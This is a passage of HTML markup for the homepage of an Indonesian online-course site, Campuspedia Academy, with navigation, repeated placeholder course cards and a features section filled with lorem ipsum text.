<!DOCTYPE html>
<html lang="en">
  
<head>
    <title>Camuspedia Academy - Beranda</title>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1">
    <link rel="icon" type="image/png" sizes="32x32" href="assets/images/favicon.ico">
    <link rel="stylesheet" type="text/css" href="assets/lib/css/bootstrap.min.css">
    <link rel="stylesheet" type="text/css" href="assets/css/font/flaticon/flaticon.css">
    <link rel="stylesheet" type="text/css" href="assets/css/style.css">
    <link rel="stylesheet" type="text/css" href="assets/lib/slick/slick.css">
    <link rel="stylesheet" type="text/css" href="assets/lib/slick/slick-theme.css">
    <link rel="stylesheet" type="text/css" href="assets/css/animate.css">
    <link rel="stylesheet" type="text/css" href="assets/css/style2.css">
  
  </head>
  <body class="home">
    <header class="header-content">
      <div class="header-top hidden-sm hidden-xs" id="header-top">
        <div class="container">
          <nav class="navbar navbar-inverse header-top__top d-flex">
            <div class="navbar-header"><a class="navbar-brand logo__link" href="/" style="display: flex; align-items: center;"><img class="logo__image" src="assets/images/logo.jpg" alt="Logo Campuspedia Academy"><h2 class="c-dark fz-30 fw-bolder" style="margin-left: 10px;">Acade<span class="c-green">my</span></h2></h4></a></div>
            <form class="navbar-form navbar-left form-search" style="margin-left: 200px;">
              <div class="form-search__input-group">
                <input class="form-control form-search__input" type="text" placeholder="Search your course...">
                <div class="form-search__btn-group">
                  <button class="btn form-search__button" type="submit"><i class="glyph-icon flaticon-search form-search__icon"></i></button>
                </div>
              </div>
            </form>
            <div class="nav navbar-nav navbar-right nav-right nav-right--login">
              <button class="btn btn-default button-default nav-right__instructor" type="submit">REGISTER</button>
              <div class="nav-right__notifications"><a class="nav-right__item" href="#"><i class="glyph-icon flaticon-commerce-1 nav-right__item__icon"></i><span class="nav-right__item__notification">10</span></a><a class="nav-right__item" href="#"><i class="glyph-icon flaticon-bell nav-right__item__icon"></i><span class="nav-right__item__notification">99</span></a>
                <div class="nav-right__profile"><i class="glyph-icon flaticon-profile-2 nav-right__profile__icon"></i><span class="nav-right__profile__status"></span>
                  <div class="profile">
                    <div class="profile__avarta" style="border: none;"><img class="profile__image" src="assets/images/profile.png" alt=""></div><a class="profile__user-name" href="#">Alfian Prisma Yopiangga</a><a class="profile__course" href="#"><i class="glyph-icon flaticon-profile profile__icon"></i><span class="profile__text">My profile</span></a><a class="profile__course" href="#"><i class="glyph-icon flaticon-shield profile__icon"></i><span class="profile__text">My course</span></a><a class="btn btn-default button-default profile__btn" href="#">Log out</a>
                  </div>
                </div>
              </div>
            </div>
            <div class="nav navbar-nav navbar-right nav-right--notlogin">
              <div class="nav-right__notifications"><a class="nav-right__item" href="#"><i class="glyph-icon flaticon-shapes nav-right__item__icon"></i><span class="nav-right__item__notification">10</span></a><a class="nav-right__item" href="#"><i class="glyph-icon flaticon-commerce-1 nav-right__item__icon"></i><span class="nav-right__item__notification">99</span></a></div>
              <div class="nav-right__signin"><a class="nav-right__signin__link" href="#">Sign in</a><span>|</span><a class="nav-right__signin__link" href="#">sign up</a></div>
            </div>
          </nav>
        </div>
      </div>
      <div class="bottom-header hidden-sm hidden-xs" id="scrollspy" data-spy="affix" data-offset-top="112">
        <div class="container" style="display: flex; align-items: center;">
          <div class="logo--menu"><a class="logo__link" href=""style="display: flex; align-items: center;"><img class="logo__image" src="assets/images/logo.jpg" alt="Logo Campuspedia Academy"><h2 class="c-dark fz-20 fw-bolder" style="margin-left: 10px;">Acade<span class="c-green">my</span></h2></a></div>
          <nav class="menu-main" style="margin: auto;">
                <ul class="nav navbar-nav menu-main__list ">
                  <li class="menu-main__item active"><a class="menu-main__link " href="#" id="home">home</a></li>
                  <li class="menu-main__item "><a class="menu-main__link " href="#">events</a> </li>
                  <li class="menu-main__item "><a class="menu-main__link " href="#">news</a></li>
                  <li class="menu-main__item "><a class="menu-main__link " href="#">panduan</a></li>
                  <li class="menu-main__item "><a class="menu-main__link " href="#">tos</a></li>
                  <li class="menu-main__item "><a class="menu-main__link " href="#">contact us</a></li>
                </ul>
          </nav>
        </div>
      </div>
      <div class="header__mobile hidden-lg hidden-md">
        <div class="header-top">
          <div class="container">
            <div class="nav-right--notlogin nav-right--notlogin--mobile pull-right">
              <div class="nav-right__notifications"><a class="nav-right__item" href="#"><i class="glyph-icon flaticon-shapes nav-right__item__icon"></i><span class="nav-right__item__notification">10</span></a><a class="nav-right__item" href="#"><i class="glyph-icon flaticon-commerce-1 nav-right__item__icon"></i><span class="nav-right__item__notification">99</span></a></div>
              <button class="form-search__button--mobile" type="submit" data-toggle="collapse" data-target="#form-search-mobile"><i class="glyph-icon flaticon-search form-search__icon"></i></button>
              <div class="nav-right__signin"><a class="nav-right__signin__link" href="#">Sign in</a><span>|</span><a class="nav-right__signin__link" href="#" >sign up</a></div>
            </div>
            <form class="navbar-form form-search--mobile" id="form-search-mobile">
              <div class="container">
                <div class="form-search__input-group">
                  <input class="form-control form-search__input" type="text" placeholder="Search your course...">
                  <div class="form-search__btn-group">
                    <button class="btn form-search__button" type="submit"><i class="glyph-icon flaticon-search form-search__icon"></i></button>
                  </div>
                </div>
                <button class="dropdown-toggle form-search__button form-search__button--close" type="submit" data-toggle="collapse" data-target="#form-search-mobile"><i class="glyph-icon flaticon-access-denied form-search__icon"></i></button>
              </div>
            </form>
          </div>
        </div>
        <nav class="navbar" id="header-mobile" data-spy="affix" data-offset-top="75">
          <div class="container">
            <button class="navbar-toggle nav-icon pull-right collapsed visible-sm visible-xs" id="menu-hamberger" data-toggle="collapse" data-target="#menu-main"><span class="bar"></span></button>
            <div class="logo--mobile text-center"><a class="logo__link" href=""><h2 class="c-dark fz-30">Acade<span class="c-green">my</span></h2></a></div>
          </div>
          <div class="menu-mobile">
                <ul class="menu-mobile__list ">
                  <li class="menu-mobile__item"><a class="menu-mobile__link" href="#">home</a><span class="" data-toggle="dropdown" onClick="void(0)"></span></li>
                  <li class="menu-mobile__item"><a class="menu-mobile__link" href="#">events</a><span class="" data-toggle="dropdown" onClick="void(0)"></span></li>
                  <li class="menu-mobile__item"><a class="menu-mobile__link" href="#">news</a><span class="" data-toggle="dropdown" onClick="void(0)"></span></li>
                  <li class="menu-mobile__item"><a class="menu-mobile__link" href="#">panduan</a><span class="" data-toggle="dropdown" onClick="void(0)"></span></li>
                  <li class="menu-mobile__item"><a class="menu-mobile__link" href="#">tos</a><span class="" data-toggle="dropdown" onClick="void(0)"></span></li>
                  <li class="menu-mobile__item"><a class="menu-mobile__link" href="#">contact us</a><span class="" data-toggle="dropdown" onClick="void(0)"></span></li>
                </ul>
          </div>
        </nav>
      </div>
      <div class="button-default btn-ontop" id="on-top"><span class="glyph-icon flaticon-arrows-5"></span></div>
    </header>

    <div class="design-sprint">
      <div class="container design-sprint__list">
        <div class="row design-sprint__content">
          <div class="col-lg-4 col-md-4 col-sm-4 design-sprint__item">
            <h1 class="design-sprint__item__title">Merancang karir bersama <span class="c-green">Campuspedia</span></h1>
            <p class="design-sprint__item__content">Campuspedia Academy siap membantu kamu mengekesplor dunia karir bersama mentor yang ahli dibidangnya</p><a class="btn button-default design-sprint__item__button" href="#">get online class</a>
          </div>
          <div class="col-lg-4 col-md-4 col-sm-4 design-sprint__item-image">
            <div class="design-sprint__wapper"><img class="design-sprint__wapper__image" src="assets/images/card.png" alt="All You Have To Know About Working in a Corporation Company"></div>
            <div class="design-sprint__contents"><a class="design-sprint__contents__title" href="#">All You Have To Know About Working in a Corporation Company</a><a class="design-sprint__contents__link" href="#">keranjang</a></div>
          </div>
          <div class="col-lg-4 col-md-4 col-sm-4 design-sprint__item-image">
            <div class="design-sprint__wapper"><img class="design-sprint__wapper__image" src="assets/images/card.png" alt="All You Have To Know About Working in a Corporation Company"></div>
            <div class="design-sprint__contents"><a class="design-sprint__contents__title" href="#">All You Have To Know About Working in a Corporation Company</a><a class="design-sprint__contents__link" href="#">keranjang</a></div>
          </div>
        </div>
      </div>
    </div>
    <div class="list-icons">
      <div class="container">
        <div class="row" style="padding-top: 20px">
          <div class="col-lg-4 col-md-6">
            <img src="assets/images/banner_1.jpg" alt="" style="width: 100%; height: auto;">
          </div>
          <div class="col-lg-4 col-md-6">
            <img src="assets/images/banner_2.jpg" alt="" style="width: 100%; height: auto;">
          </div>
          <div class="col-lg-4 col-md-6">
            <img src="assets/images/banner_1.jpg" alt="" style="width: 100%; height: auto;">
          </div>
        </div>
      </div>
    </div>
    <section class="spy list-course" id="exploer">
      <div class="container">
        <div class="list-course__header">
          <h2 class="list-course__header__title wow fadeInDown" data-wow-duration="1s" data-wow-delay="0.002s">kelas reguler</h2>
          <div class="list-course__view-more"><a class="list-course__header__btn"><span class="list-course__header__text">view more</span></a>
            <div class="list-course__header__icon list-course-icon-arrow-special"><span class="glyph-icon flaticon-arrows-3 list-course__header__icon-arrow"></span></div>
          </div>
        </div>
        <div class="list-course__gird">
          <div class="course specializations">
                <div class="special courses__list ">
                  <div class="undefined courses__item">
                    <div class="courses__wapper">
                      <div class="col-equal courses__top">
                        <div class="courses__top__wapper"><img class="courses__top__image" src="assets/images/card.png" alt=""></div>
                        <div class="courses__top__bundle">available</div>
                        <div class="courses__top__bt-seller">kelas reguler</div>
                        <div class="courses__hover">
                          <div class="courses__hover-content"><span class="courses__hover-content__item"><span class="glyph-icon flaticon-interface courses__hover-content__icon"></span></span></div>
                        </div>
                      </div>
                      <div class="col-equal courses__content"><a class="courses__content__title" href="#">Penulisan Karya Tulis Ilmiah dan </a>
                        <div class="courses__content__author">
                            <div class="col-left__item"><span class="courses__content__icon"><span class="glyph-icon flaticon-calendar icon-custom"></span></span><span class="courses__content__number">29 August 2020 3:00 - 5:00 pm</span></div>
                        </div>
                        <div class="courses__content__info">
                          <div class="courses__col-left" style="width: 50%;">
                            <div class="col-left__item"><span class="courses__content__icon"><span class="glyph-icon flaticon-profile-1 icon-custom"></span></span><span class="courses__content__number">100 (85 left)</span></div>
                          </div>
                          <div class="courses__col-right courses__content__price" style="width: 50%;">Rp 27.500</div>
                        </div>
                      </div>
                    </div>
                  </div>
                  <div class="undefined courses__item">
                    <div class="courses__wapper">
                      <div class="col-equal courses__top">
                        <div class="courses__top__wapper"><img class="courses__top__image" src="assets/images/card.png" alt=""></div>
                        <div class="courses__top__bundle">available</div>
                        <div class="courses__top__bt-seller">kelas reguler</div>
                        <div class="courses__hover">
                          <div class="courses__hover-content"><span class="courses__hover-content__item"><span class="glyph-icon flaticon-interface courses__hover-content__icon"></span></span></div>
                        </div>
                      </div>
                      <div class="col-equal courses__content"><a class="courses__content__title" href="#">Penulisan Karya Tulis Ilmiah dan </a>
                        <div class="courses__content__author">
                            <div class="col-left__item"><span class="courses__content__icon"><span class="glyph-icon flaticon-calendar icon-custom"></span></span><span class="courses__content__number">29 August 2020 3:00 - 5:00 pm</span></div>
                        </div>
                        <div class="courses__content__info">
                          <div class="courses__col-left" style="width: 50%;">
                            <div class="col-left__item"><span class="courses__content__icon"><span class="glyph-icon flaticon-profile-1 icon-custom"></span></span><span class="courses__content__number">100 (85 left)</span></div>
                          </div>
                          <div class="courses__col-right courses__content__price" style="width: 50%;">Rp 27.500</div>
                        </div>
                      </div>
                    </div>
                  </div>
                  <div class="undefined courses__item">
                    <div class="courses__wapper">
                      <div class="col-equal courses__top">
                        <div class="courses__top__wapper"><img class="courses__top__image" src="assets/images/card.png" alt=""></div>
                        <div class="courses__top__bundle">available</div>
                        <div class="courses__top__bt-seller">kelas reguler</div>
                        <div class="courses__hover">
                          <div class="courses__hover-content"><span class="courses__hover-content__item"><span class="glyph-icon flaticon-interface courses__hover-content__icon"></span></span></div>
                        </div>
                      </div>
                      <div class="col-equal courses__content"><a class="courses__content__title" href="#">Penulisan Karya Tulis Ilmiah dan </a>
                        <div class="courses__content__author">
                            <div class="col-left__item"><span class="courses__content__icon"><span class="glyph-icon flaticon-calendar icon-custom"></span></span><span class="courses__content__number">29 August 2020 3:00 - 5:00 pm</span></div>
                        </div>
                        <div class="courses__content__info">
                          <div class="courses__col-left" style="width: 50%;">
                            <div class="col-left__item"><span class="courses__content__icon"><span class="glyph-icon flaticon-profile-1 icon-custom"></span></span><span class="courses__content__number">100 (85 left)</span></div>
                          </div>
                          <div class="courses__col-right courses__content__price" style="width: 50%;">Rp 27.500</div>
                        </div>
                      </div>
                    </div>
                  </div>
                  <div class="undefined courses__item">
                    <div class="courses__wapper">
                      <div class="col-equal courses__top">
                        <div class="courses__top__wapper"><img class="courses__top__image" src="assets/images/card.png" alt=""></div>
                        <div class="courses__top__bundle">available</div>
                        <div class="courses__top__bt-seller">kelas reguler</div>
                        <div class="courses__hover">
                          <div class="courses__hover-content"><span class="courses__hover-content__item"><span class="glyph-icon flaticon-interface courses__hover-content__icon"></span></span></div>
                        </div>
                      </div>
                      <div class="col-equal courses__content"><a class="courses__content__title" href="#">Penulisan Karya Tulis Ilmiah dan </a>
                        <div class="courses__content__author">
                            <div class="col-left__item"><span class="courses__content__icon"><span class="glyph-icon flaticon-calendar icon-custom"></span></span><span class="courses__content__number">29 August 2020 3:00 - 5:00 pm</span></div>
                        </div>
                        <div class="courses__content__info">
                          <div class="courses__col-left" style="width: 50%;">
                            <div class="col-left__item"><span class="courses__content__icon"><span class="glyph-icon flaticon-profile-1 icon-custom"></span></span><span class="courses__content__number">100 (85 left)</span></div>
                          </div>
                          <div class="courses__col-right courses__content__price" style="width: 50%;">Rp 27.500</div>
                        </div>
                      </div>
                    </div>
                  </div>
                  <div class="undefined courses__item">
                    <div class="courses__wapper">
                      <div class="col-equal courses__top">
                        <div class="courses__top__wapper"><img class="courses__top__image" src="assets/images/card.png" alt=""></div>
                        <div class="courses__top__bundle">available</div>
                        <div class="courses__top__bt-seller">kelas reguler</div>
                        <div class="courses__hover">
                          <div class="courses__hover-content"><span class="courses__hover-content__item"><span class="glyph-icon flaticon-interface courses__hover-content__icon"></span></span></div>
                        </div>
                      </div>
                      <div class="col-equal courses__content"><a class="courses__content__title" href="#">Penulisan Karya Tulis Ilmiah dan </a>
                        <div class="courses__content__author">
                            <div class="col-left__item"><span class="courses__content__icon"><span class="glyph-icon flaticon-calendar icon-custom"></span></span><span class="courses__content__number">29 August 2020 3:00 - 5:00 pm</span></div>
                        </div>
                        <div class="courses__content__info">
                          <div class="courses__col-left" style="width: 50%;">
                            <div class="col-left__item"><span class="courses__content__icon"><span class="glyph-icon flaticon-profile-1 icon-custom"></span></span><span class="courses__content__number">100 (85 left)</span></div>
                          </div>
                          <div class="courses__col-right courses__content__price" style="width: 50%;">Rp 27.500</div>
                        </div>
                      </div>
                    </div>
                  </div>
                  <div class="undefined courses__item">
                    <div class="courses__wapper">
                      <div class="col-equal courses__top">
                        <div class="courses__top__wapper"><img class="courses__top__image" src="assets/images/card.png" alt=""></div>
                        <div class="courses__top__bundle">available</div>
                        <div class="courses__top__bt-seller">kelas reguler</div>
                        <div class="courses__hover">
                          <div class="courses__hover-content"><span class="courses__hover-content__item"><span class="glyph-icon flaticon-interface courses__hover-content__icon"></span></span></div>
                        </div>
                      </div>
                      <div class="col-equal courses__content"><a class="courses__content__title" href="#">Penulisan Karya Tulis Ilmiah dan </a>
                        <div class="courses__content__author">
                            <div class="col-left__item"><span class="courses__content__icon"><span class="glyph-icon flaticon-calendar icon-custom"></span></span><span class="courses__content__number">29 August 2020 3:00 - 5:00 pm</span></div>
                        </div>
                        <div class="courses__content__info">
                          <div class="courses__col-left" style="width: 50%;">
                            <div class="col-left__item"><span class="courses__content__icon"><span class="glyph-icon flaticon-profile-1 icon-custom"></span></span><span class="courses__content__number">100 (85 left)</span></div>
                          </div>
                          <div class="courses__col-right courses__content__price" style="width: 50%;">Rp 27.500</div>
                        </div>
                      </div>
                    </div>
                  </div>
                  <div class="undefined courses__item">
                    <div class="courses__wapper">
                      <div class="col-equal courses__top">
                        <div class="courses__top__wapper"><img class="courses__top__image" src="assets/images/card.png" alt=""></div>
                        <div class="courses__top__bundle">available</div>
                        <div class="courses__top__bt-seller">kelas reguler</div>
                        <div class="courses__hover">
                          <div class="courses__hover-content"><span class="courses__hover-content__item"><span class="glyph-icon flaticon-interface courses__hover-content__icon"></span></span></div>
                        </div>
                      </div>
                      <div class="col-equal courses__content"><a class="courses__content__title" href="#">Penulisan Karya Tulis Ilmiah dan </a>
                        <div class="courses__content__author">
                            <div class="col-left__item"><span class="courses__content__icon"><span class="glyph-icon flaticon-calendar icon-custom"></span></span><span class="courses__content__number">29 August 2020 3:00 - 5:00 pm</span></div>
                        </div>
                        <div class="courses__content__info">
                          <div class="courses__col-left" style="width: 50%;">
                            <div class="col-left__item"><span class="courses__content__icon"><span class="glyph-icon flaticon-profile-1 icon-custom"></span></span><span class="courses__content__number">100 (85 left)</span></div>
                          </div>
                          <div class="courses__col-right courses__content__price" style="width: 50%;">Rp 27.500</div>
                        </div>
                      </div>
                    </div>
                  </div>
                  <div class="undefined courses__item">
                    <div class="courses__wapper">
                      <div class="col-equal courses__top">
                        <div class="courses__top__wapper"><img class="courses__top__image" src="assets/images/card.png" alt=""></div>
                        <div class="courses__top__bundle">available</div>
                        <div class="courses__top__bt-seller">kelas reguler</div>
                        <div class="courses__hover">
                          <div class="courses__hover-content"><span class="courses__hover-content__item"><span class="glyph-icon flaticon-interface courses__hover-content__icon"></span></span></div>
                        </div>
                      </div>
                      <div class="col-equal courses__content"><a class="courses__content__title" href="#">Penulisan Karya Tulis Ilmiah dan </a>
                        <div class="courses__content__author">
                            <div class="col-left__item"><span class="courses__content__icon"><span class="glyph-icon flaticon-calendar icon-custom"></span></span><span class="courses__content__number">29 August 2020 3:00 - 5:00 pm</span></div>
                        </div>
                        <div class="courses__content__info">
                          <div class="courses__col-left" style="width: 50%;">
                            <div class="col-left__item"><span class="courses__content__icon"><span class="glyph-icon flaticon-profile-1 icon-custom"></span></span><span class="courses__content__number">100 (85 left)</span></div>
                          </div>
                          <div class="courses__col-right courses__content__price" style="width: 50%;">Rp 27.500</div>
                        </div>
                      </div>
                    </div>
                  </div>
     
                </div>
          </div>
        </div>
      </div>
    </section>
    <section class="spy list-course" id="exploer">
      <div class="container">
        <div class="list-course__header">
          <h2 class="list-course__header__title wow fadeInDown" data-wow-duration="1s" data-wow-delay="0.002s">kelas series</h2>
          <div class="list-course__view-more"><a class="list-course__header__btn"><span class="list-course__header__text">view more</span></a>
            <div class="list-course__header__icon list-course-icon-arrow-special"><span class="glyph-icon flaticon-arrows-3 list-course__header__icon-arrow"></span></div>
          </div>
        </div>
        <div class="list-course__gird">
          <div class="course specializations">
                <div class="special courses__list ">
                  <div class="undefined courses__item">
                    <div class="courses__wapper">
                      <div class="col-equal courses__top">
                        <div class="courses__top__wapper"><img class="courses__top__image" src="assets/images/card.png" alt=""></div>
                        <div class="courses__top__bundle">available</div>
                        <div class="courses__top__bt-seller">kelas series</div>
                        <div class="courses__hover">
                          <div class="courses__hover-content"><span class="courses__hover-content__item"><span class="glyph-icon flaticon-interface courses__hover-content__icon"></span></span></div>
                        </div>
                      </div>
                      <div class="col-equal courses__content"><a class="courses__content__title" href="#">Penulisan Karya Tulis Ilmiah dan </a>
                        <div class="courses__content__author">
                            <div class="col-left__item"><span class="courses__content__icon"><span class="glyph-icon flaticon-calendar icon-custom"></span></span><span class="courses__content__number">29 August 2020 3:00 - 5:00 pm</span></div>
                        </div>
                        <div class="courses__content__info">
                          <div class="courses__col-left" style="width: 50%;">
                            <div class="col-left__item"><span class="courses__content__icon"><span class="glyph-icon flaticon-profile-1 icon-custom"></span></span><span class="courses__content__number">100 (85 left)</span></div>
                          </div>
                          <div class="courses__col-right courses__content__price" style="width: 50%;">Rp 27.500</div>
                        </div>
                      </div>
                    </div>
                  </div>
                  <div class="undefined courses__item">
                    <div class="courses__wapper">
                      <div class="col-equal courses__top">
                        <div class="courses__top__wapper"><img class="courses__top__image" src="assets/images/card.png" alt=""></div>
                        <div class="courses__top__bundle">available</div>
                        <div class="courses__top__bt-seller">kelas series</div>
                        <div class="courses__hover">
                          <div class="courses__hover-content"><span class="courses__hover-content__item"><span class="glyph-icon flaticon-interface courses__hover-content__icon"></span></span></div>
                        </div>
                      </div>
                      <div class="col-equal courses__content"><a class="courses__content__title" href="#">Penulisan Karya Tulis Ilmiah dan </a>
                        <div class="courses__content__author">
                            <div class="col-left__item"><span class="courses__content__icon"><span class="glyph-icon flaticon-calendar icon-custom"></span></span><span class="courses__content__number">29 August 2020 3:00 - 5:00 pm</span></div>
                        </div>
                        <div class="courses__content__info">
                          <div class="courses__col-left" style="width: 50%;">
                            <div class="col-left__item"><span class="courses__content__icon"><span class="glyph-icon flaticon-profile-1 icon-custom"></span></span><span class="courses__content__number">100 (85 left)</span></div>
                          </div>
                          <div class="courses__col-right courses__content__price" style="width: 50%;">Rp 27.500</div>
                        </div>
                      </div>
                    </div>
                  </div>
                  <div class="undefined courses__item">
                    <div class="courses__wapper">
                      <div class="col-equal courses__top">
                        <div class="courses__top__wapper"><img class="courses__top__image" src="assets/images/card.png" alt=""></div>
                        <div class="courses__top__bundle">available</div>
                        <div class="courses__top__bt-seller">kelas series</div>
                        <div class="courses__hover">
                          <div class="courses__hover-content"><span class="courses__hover-content__item"><span class="glyph-icon flaticon-interface courses__hover-content__icon"></span></span></div>
                        </div>
                      </div>
                      <div class="col-equal courses__content"><a class="courses__content__title" href="#">Penulisan Karya Tulis Ilmiah dan </a>
                        <div class="courses__content__author">
                            <div class="col-left__item"><span class="courses__content__icon"><span class="glyph-icon flaticon-calendar icon-custom"></span></span><span class="courses__content__number">29 August 2020 3:00 - 5:00 pm</span></div>
                        </div>
                        <div class="courses__content__info">
                          <div class="courses__col-left" style="width: 50%;">
                            <div class="col-left__item"><span class="courses__content__icon"><span class="glyph-icon flaticon-profile-1 icon-custom"></span></span><span class="courses__content__number">100 (85 left)</span></div>
                          </div>
                          <div class="courses__col-right courses__content__price" style="width: 50%;">Rp 27.500</div>
                        </div>
                      </div>
                    </div>
                  </div>
                  <div class="undefined courses__item">
                    <div class="courses__wapper">
                      <div class="col-equal courses__top">
                        <div class="courses__top__wapper"><img class="courses__top__image" src="assets/images/card.png" alt=""></div>
                        <div class="courses__top__bundle">available</div>
                        <div class="courses__top__bt-seller">kelas series</div>
                        <div class="courses__hover">
                          <div class="courses__hover-content"><span class="courses__hover-content__item"><span class="glyph-icon flaticon-interface courses__hover-content__icon"></span></span></div>
                        </div>
                      </div>
                      <div class="col-equal courses__content"><a class="courses__content__title" href="#">Penulisan Karya Tulis Ilmiah dan </a>
                        <div class="courses__content__author">
                            <div class="col-left__item"><span class="courses__content__icon"><span class="glyph-icon flaticon-calendar icon-custom"></span></span><span class="courses__content__number">29 August 2020 3:00 - 5:00 pm</span></div>
                        </div>
                        <div class="courses__content__info">
                          <div class="courses__col-left" style="width: 50%;">
                            <div class="col-left__item"><span class="courses__content__icon"><span class="glyph-icon flaticon-profile-1 icon-custom"></span></span><span class="courses__content__number">100 (85 left)</span></div>
                          </div>
                          <div class="courses__col-right courses__content__price" style="width: 50%;">Rp 27.500</div>
                        </div>
                      </div>
                    </div>
                  </div>
                  <div class="undefined courses__item">
                    <div class="courses__wapper">
                      <div class="col-equal courses__top">
                        <div class="courses__top__wapper"><img class="courses__top__image" src="assets/images/card.png" alt=""></div>
                        <div class="courses__top__bundle">available</div>
                        <div class="courses__top__bt-seller">kelas series</div>
                        <div class="courses__hover">
                          <div class="courses__hover-content"><span class="courses__hover-content__item"><span class="glyph-icon flaticon-interface courses__hover-content__icon"></span></span></div>
                        </div>
                      </div>
                      <div class="col-equal courses__content"><a class="courses__content__title" href="#">Penulisan Karya Tulis Ilmiah dan </a>
                        <div class="courses__content__author">
                            <div class="col-left__item"><span class="courses__content__icon"><span class="glyph-icon flaticon-calendar icon-custom"></span></span><span class="courses__content__number">29 August 2020 3:00 - 5:00 pm</span></div>
                        </div>
                        <div class="courses__content__info">
                          <div class="courses__col-left" style="width: 50%;">
                            <div class="col-left__item"><span class="courses__content__icon"><span class="glyph-icon flaticon-profile-1 icon-custom"></span></span><span class="courses__content__number">100 (85 left)</span></div>
                          </div>
                          <div class="courses__col-right courses__content__price" style="width: 50%;">Rp 27.500</div>
                        </div>
                      </div>
                    </div>
                  </div>
                  <div class="undefined courses__item">
                    <div class="courses__wapper">
                      <div class="col-equal courses__top">
                        <div class="courses__top__wapper"><img class="courses__top__image" src="assets/images/card.png" alt=""></div>
                        <div class="courses__top__bundle">available</div>
                        <div class="courses__top__bt-seller">kelas series</div>
                        <div class="courses__hover">
                          <div class="courses__hover-content"><span class="courses__hover-content__item"><span class="glyph-icon flaticon-interface courses__hover-content__icon"></span></span></div>
                        </div>
                      </div>
                      <div class="col-equal courses__content"><a class="courses__content__title" href="#">Penulisan Karya Tulis Ilmiah dan </a>
                        <div class="courses__content__author">
                            <div class="col-left__item"><span class="courses__content__icon"><span class="glyph-icon flaticon-calendar icon-custom"></span></span><span class="courses__content__number">29 August 2020 3:00 - 5:00 pm</span></div>
                        </div>
                        <div class="courses__content__info">
                          <div class="courses__col-left" style="width: 50%;">
                            <div class="col-left__item"><span class="courses__content__icon"><span class="glyph-icon flaticon-profile-1 icon-custom"></span></span><span class="courses__content__number">100 (85 left)</span></div>
                          </div>
                          <div class="courses__col-right courses__content__price" style="width: 50%;">Rp 27.500</div>
                        </div>
                      </div>
                    </div>
                  </div>
                  <div class="undefined courses__item">
                    <div class="courses__wapper">
                      <div class="col-equal courses__top">
                        <div class="courses__top__wapper"><img class="courses__top__image" src="assets/images/card.png" alt=""></div>
                        <div class="courses__top__bundle">available</div>
                        <div class="courses__top__bt-seller">kelas series</div>
                        <div class="courses__hover">
                          <div class="courses__hover-content"><span class="courses__hover-content__item"><span class="glyph-icon flaticon-interface courses__hover-content__icon"></span></span></div>
                        </div>
                      </div>
                      <div class="col-equal courses__content"><a class="courses__content__title" href="#">Penulisan Karya Tulis Ilmiah dan </a>
                        <div class="courses__content__author">
                            <div class="col-left__item"><span class="courses__content__icon"><span class="glyph-icon flaticon-calendar icon-custom"></span></span><span class="courses__content__number">29 August 2020 3:00 - 5:00 pm</span></div>
                        </div>
                        <div class="courses__content__info">
                          <div class="courses__col-left" style="width: 50%;">
                            <div class="col-left__item"><span class="courses__content__icon"><span class="glyph-icon flaticon-profile-1 icon-custom"></span></span><span class="courses__content__number">100 (85 left)</span></div>
                          </div>
                          <div class="courses__col-right courses__content__price" style="width: 50%;">Rp 27.500</div>
                        </div>
                      </div>
                    </div>
                  </div>
                  <div class="undefined courses__item">
                    <div class="courses__wapper">
                      <div class="col-equal courses__top">
                        <div class="courses__top__wapper"><img class="courses__top__image" src="assets/images/card.png" alt=""></div>
                        <div class="courses__top__bundle">available</div>
                        <div class="courses__top__bt-seller">kelas series</div>
                        <div class="courses__hover">
                          <div class="courses__hover-content"><span class="courses__hover-content__item"><span class="glyph-icon flaticon-interface courses__hover-content__icon"></span></span></div>
                        </div>
                      </div>
                      <div class="col-equal courses__content"><a class="courses__content__title" href="#">Penulisan Karya Tulis Ilmiah dan </a>
                        <div class="courses__content__author">
                            <div class="col-left__item"><span class="courses__content__icon"><span class="glyph-icon flaticon-calendar icon-custom"></span></span><span class="courses__content__number">29 August 2020 3:00 - 5:00 pm</span></div>
                        </div>
                        <div class="courses__content__info">
                          <div class="courses__col-left" style="width: 50%;">
                            <div class="col-left__item"><span class="courses__content__icon"><span class="glyph-icon flaticon-profile-1 icon-custom"></span></span><span class="courses__content__number">100 (85 left)</span></div>
                          </div>
                          <div class="courses__col-right courses__content__price" style="width: 50%;">Rp 27.500</div>
                        </div>
                      </div>
                    </div>
                  </div>
     
                </div>
          </div>
        </div>
      </div>
    </section>
    <div class="best-features event spy" id="partner">
      <div class="container">
        <div class="list-course__header">
          <h2 class="list-course__header__title"> yang anda dapatkan</h2>
        </div>
        <div class="row">
          <div class="item">
            <div class="col-lg-5 col-md-5 item__left wow zoomInLeft"><img class="item__left__image" src="assets/images/video_playback.png" alt="">
              <h3 class="item__left__title">video playback</h3>
              <p class="item__left__content">
                Video Playback dapat diakses selamanya. Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. 
              </p>
            </div>
            <div class="col-lg-7 col-md-7 item__right">
              <div class="item__right__image-left"><img class="item__right__image" src="assets/images/video_playback_2.png" alt=""></div>
              <div class="item__right__image-right"><img class="item__right__image" src="assets/images/video_playback_1.png" alt=""></div>
            </div>
          </div>
          <div class="item">
            <div class="col-lg-5 col-md-5 item__left wow zoomInRight"><img class="item__left__image" src="assets/images/modul_materi.png" alt="">
              <h3 class="item__left__title">modul materi</h3>
              <p class="item__left__content">
                Modul materi online course. Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. 
              </p>
            </div>
            <div class="col-lg-7 col-md-7 item__right">
              <div class="item__right__image-left"><img class="item__right__image" src="assets/images/modul_materi_2.png" alt=""></div>
              <div class="item__right__image-right"><img class="item__right__image" src="assets/images/modul_materi_1.png" alt=""></div>
            </div>
          </div>
          <div class="item">
            <div class="col-lg-5 col-md-5 item__left wow zoomInLeft"><img class="item__left__image" src="assets/images/group_chat.png" alt="">
              <h3 class="item__left__title">group chat</h3>
              <p class="item__left__content">
                Group chat untuk berdiskusi Bersama. Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. 
              </p>
            </div>
